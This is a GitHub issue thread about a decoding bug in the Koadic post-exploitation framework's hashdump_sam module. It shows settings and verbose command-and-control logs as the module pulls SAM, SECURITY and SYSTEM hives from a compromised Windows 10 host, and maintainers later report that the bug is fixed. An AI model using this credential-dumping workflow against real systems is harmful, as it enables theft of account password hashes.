### ISSUE TITLE
hashdump_sam - UnicodeDecodeError

### ISSUE THREAD

**Issue by Dexessus** [zerosum0x0/koadic#71]
**Test environment**
Attacker: Kali Linux
Victim: Windows 10 (Build: 1803) 17134.345

Got elevated access via mshta.
```
        Status:                 Alive                                  
        Listener:               0                               
        IP:                     176.119.75.100                  
        Hostname:               DESKTOP-VICTIM                                   
        OS:                     Windows 10 Pro                  
        OSBuild:                17134                           
        OSArch:                 64                              
        Elevated:               YES!   
```

Settings:
```
        NAME        VALUE               REQ     DESCRIPTION     
        -----       ------------        ----    -------------   
        LPATH       /tmp/               yes     local file save path
        RPATH       %TEMP%              yes     remote file save path
        GETSYSHIVE  false               yes     Retrieve the system hive? (slower, but more reliable)
        ZOMBIE      1                   yes     the zombie to target
```
Then run `implant/gather/hashdump_sam`

```
[v] Server: <Server(Thread-53, started daemon 139803189765888)> Sesson <core.session.Session object at 0x7f2675c68550>
[*] Zombie 1: Job 3 (implant/gather/hashdump_sam) created.
[v] session::get_created_job - fetched job.key = 1e98f9ec97fb45e5a17ddf3dcbc2b451
[v] handler::reply() - sending status 201 with 32 bytes to ('176.119.75.100', 50405)
[v] handler::handle() - Incoming HTTP from ('176.119.75.100', 50408)
[v] handler::find_session() - found session.key = ee3afe4ae740442090737f531d29b942
[v] self.params:  {'sid': ['ee3afe4ae740442090737f531d29b942'], 'csrf': ['stage']}
[v] handler::handle() - Incoming HTTP from ('176.119.75.100', 50409)
[v] handler::find_session() - found session.key = ee3afe4ae740442090737f531d29b942
[v] self.params:  {'sid': ['ee3afe4ae740442090737f531d29b942'], 'csrf': ['1e98f9ec97fb45e5a17ddf3dcbc2b451']}
[v] session::get_job() - fetched job_key = 1e98f9ec97fb45e5a17ddf3dcbc2b451
[v] handler::reply() - sending status 200 with 7406 bytes to ('176.119.75.100', 50409)
[v] handler::handle() - Incoming HTTP from ('176.119.75.100', 50410)
[v] handler::find_session() - found session.key = ee3afe4ae740442090737f531d29b942
[v] self.params:  {'sid': ['ee3afe4ae740442090737f531d29b942'], 'csrf': ['1e98f9ec97fb45e5a17ddf3dcbc2b451']}
[v] session::get_job() - fetched job_key = 1e98f9ec97fb45e5a17ddf3dcbc2b451
[v] handler::reply() - sending status 200 with 0 bytes to ('176.119.75.100', 50410)
[*] Zombie 1: Job 3 (implant/gather/hashdump_sam) received SAM hive (88770 bytes)
[v] handler::handle() - Incoming HTTP from ('176.119.75.100', 50411)
[v] handler::find_session() - found session.key = ee3afe4ae740442090737f531d29b942
[v] self.params:  {'sid': ['ee3afe4ae740442090737f531d29b942'], 'csrf': ['1e98f9ec97fb45e5a17ddf3dcbc2b451']}
[v] session::get_job() - fetched job_key = 1e98f9ec97fb45e5a17ddf3dcbc2b451
[v] handler::reply() - sending status 200 with 0 bytes to ('176.119.75.100', 50411)
[*] Zombie 1: Job 3 (implant/gather/hashdump_sam) received SECURITY hive (65328 bytes)
[v] handler::handle() - Incoming HTTP from ('176.119.75.100', 50412)
[v] handler::find_session() - found session.key = ee3afe4ae740442090737f531d29b942
[v] self.params:  {'sid': ['ee3afe4ae740442090737f531d29b942'], 'csrf': ['1e98f9ec97fb45e5a17ddf3dcbc2b451']}
[v] session::get_job() - fetched job_key = 1e98f9ec97fb45e5a17ddf3dcbc2b451
[v] handler::reply() - sending status 200 with 0 bytes to ('176.119.75.100', 50412)
[*] Zombie 1: Job 3 (implant/gather/hashdump_sam) received SysKey (64730 bytes)
[v] handler::handle() - Incoming HTTP from ('176.119.75.100', 50413)
[v] handler::find_session() - found session.key = ee3afe4ae740442090737f531d29b942
[v] self.params:  {'sid': ['ee3afe4ae740442090737f531d29b942'], 'csrf': ['1e98f9ec97fb45e5a17ddf3dcbc2b451']}
[v] session::get_job() - fetched job_key = 1e98f9ec97fb45e5a17ddf3dcbc2b451
[v] handler::reply() - sending status 200 with 0 bytes to ('176.119.75.100', 50413)
[*] Zombie 1: Job 3 (implant/gather/hashdump_sam) decoded SAM hive (/tmp/SAM.176.119.75.100.2b428924cbaf49babdd901da6d7bcabe)
[*] Zombie 1: Job 3 (implant/gather/hashdump_sam) decoded SECURITY hive (/tmp/SECURITY.176.119.75.100.796e512726544551b2612652b3ea5aa5)
(koadic: imp/gat/hashdump_sam)# Exception in thread Thread-4115:
Traceback (most recent call last):
  File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.6/threading.py", line 864, in run
    self._target(*self._args, **self._kwargs)
  File "modules/implant/gather/hashdump_sam.py", line 124, in finish_up
    tmp_syskey += file_contents[i:i+1].decode()
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xd0 in position 0: unexpected end of data
```

Then tried to use `set GETSYSHIVE true`
```
[v] Server: <Server(Thread-53, started daemon 139803189765888)> Sesson <core.session.Session object at 0x7f2675c68550>
[*] Zombie 1: Job 4 (implant/gather/hashdump_sam) created.
[v] session::get_created_job - fetched job.key = 2520f5f2f1b44a169643e83bfdbaaaa5
[v] handler::reply() - sending status 201 with 32 bytes to ('176.119.75.100', 50408)
[v] handler::handle() - Incoming HTTP from ('176.119.75.100', 50419)
[v] handler::find_session() - found session.key = ee3afe4ae740442090737f531d29b942
[v] self.params:  {'sid': ['ee3afe4ae740442090737f531d29b942'], 'csrf': ['2520f5f2f1b44a169643e83bfdbaaaa5']}
[v] session::get_job() - fetched job_key = 2520f5f2f1b44a169643e83bfdbaaaa5
[v] handler::reply() - sending status 200 with 7405 bytes to ('176.119.75.100', 50419)
[v] handler::handle() - Incoming HTTP from ('176.119.75.100', 50420)
[v] handler::find_session() - found session.key = ee3afe4ae740442090737f531d29b942
[v] handler::handle_stage()
[v] handler::reply() - sending status 200 with 10191 bytes to ('176.119.75.100', 50420)
[v] handler::handle() - Incoming HTTP from ('176.119.75.100', 50421)
[v] handler::find_session() - found session.key = ee3afe4ae740442090737f531d29b942
[v] self.params:  {'sid': ['ee3afe4ae740442090737f531d29b942'], 'csrf': ['stage']}
[v] handler::handle() - Incoming HTTP from ('176.119.75.100', 50422)
[v] handler::find_session() - found session.key = ee3afe4ae740442090737f531d29b942
[v] self.params:  {'sid': ['ee3afe4ae740442090737f531d29b942'], 'csrf': ['2520f5f2f1b44a169643e83bfdbaaaa5']}
[v] session::get_job() - fetched job_key = 2520f5f2f1b44a169643e83bfdbaaaa5
[v] handler::reply() - sending status 200 with 0 bytes to ('176.119.75.100', 50422)
[*] Zombie 1: Job 4 (implant/gather/hashdump_sam) received SAM hive (88770 bytes)
[v] handler::handle() - Incoming HTTP from ('176.119.75.100', 50423)
[v] handler::find_session() - found session.key = ee3afe4ae740442090737f531d29b942
[v] self.params:  {'sid': ['ee3afe4ae740442090737f531d29b942'], 'csrf': ['2520f5f2f1b44a169643e83bfdbaaaa5']}
[v] session::get_job() - fetched job_key = 2520f5f2f1b44a169643e83bfdbaaaa5
[v] handler::reply() - sending status 200 with 0 bytes to ('176.119.75.100', 50423)
[*] Zombie 1: Job 4 (implant/gather/hashdump_sam) received SECURITY hive (65328 bytes)
[v] handler::handle() - Incoming HTTP from ('176.119.75.100', 50424)
[v] handler::find_session() - found session.key = ee3afe4ae740442090737f531d29b942
[v] self.params:  {'sid': ['ee3afe4ae740442090737f531d29b942'], 'csrf': ['2520f5f2f1b44a169643e83bfdbaaaa5']}
[v] session::get_job() - fetched job_key = 2520f5f2f1b44a169643e83bfdbaaaa5
[v] handler::reply() - sending status 200 with 0 bytes to ('176.119.75.100', 50424)
[*] Zombie 1: Job 4 (implant/gather/hashdump_sam) received SYSTEM hive (16437580 bytes)
[v] handler::handle() - Incoming HTTP from ('176.119.75.100', 50425)
[v] handler::find_session() - found session.key = ee3afe4ae740442090737f531d29b942
[v] self.params:  {'sid': ['ee3afe4ae740442090737f531d29b942'], 'csrf': ['2520f5f2f1b44a169643e83bfdbaaaa5']}
[v] session::get_job() - fetched job_key = 2520f5f2f1b44a169643e83bfdbaaaa5
[v] handler::reply() - sending status 200 with 0 bytes to ('176.119.75.100', 50425)
[*] Zombie 1: Job 4 (implant/gather/hashdump_sam) decoded SAM hive (/tmp/SAM.176.119.75.100.1c3aa3396b0a45d3acca7f183f23ffd2)
[*] Zombie 1: Job 4 (implant/gather/hashdump_sam) decoded SECURITY hive (/tmp/SECURITY.176.119.75.100.3cb5a803b8bc4d35a2df48231e512382)
[*] Zombie 1: Job 4 (implant/gather/hashdump_sam) decoded SYSTEM hive (/tmp/SYSTEM.176.119.75.100.0f0438eaf3fa4885abeba0a7797be0e0)
Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies

[-] Can't find root key!
[-] 'NoneType' object has no attribute '__getitem__'
[*] Cleaning up... 
```

I am not sure, is it correct result. :)
But with  `set GETSYSHIVE false` - as I mentioned at first, there is decode error.
I think this is because user name is cyryllic too.

**Comment by TheNaterz** [comment]
This is a known issue. Just need to figure out a reliable way to convert the data to UTF-8.

**Comment by TheNaterz** [comment]
Duplicate of #68

**Comment by TheNaterz** [comment]
Should be fixed now.
